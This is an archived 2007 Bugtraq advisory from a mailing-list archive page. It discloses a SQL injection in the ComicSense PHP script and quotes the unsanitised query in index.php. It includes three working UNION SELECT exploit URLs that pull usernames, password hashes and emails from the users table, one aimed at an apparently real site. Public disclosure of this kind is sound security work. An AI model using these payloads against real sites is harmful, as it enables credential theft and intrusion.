| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 5 Jun 2007 17:21:53 -0000 From: s0cratex@...mail.com To: bugtraq@...urityfocus.com Subject: Comicsense SQL Injection Advisory/Exploit ********************************************* * Comicsense SQL Injection Advisory/Exploit * ********************************************* by s0cratex s0cratex@...mail.com http://plexinium.net - ComicSense is a script using php / mySQL. It allows you to easily host an Online Comic or Image shack. You can download it from www.gayadesign.nl/comicsense/ - The bug is a common sql injection in "index.php" Line 32: $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; And the variable $epi is not verified... Exploit: -------- Admin username http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users MD5 hash password: http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users e-Mail adress: http://www.sneakyshits.com/comics/index.php?epi=-1 union select email,1,1 from users
Powered by blists - more mailing lists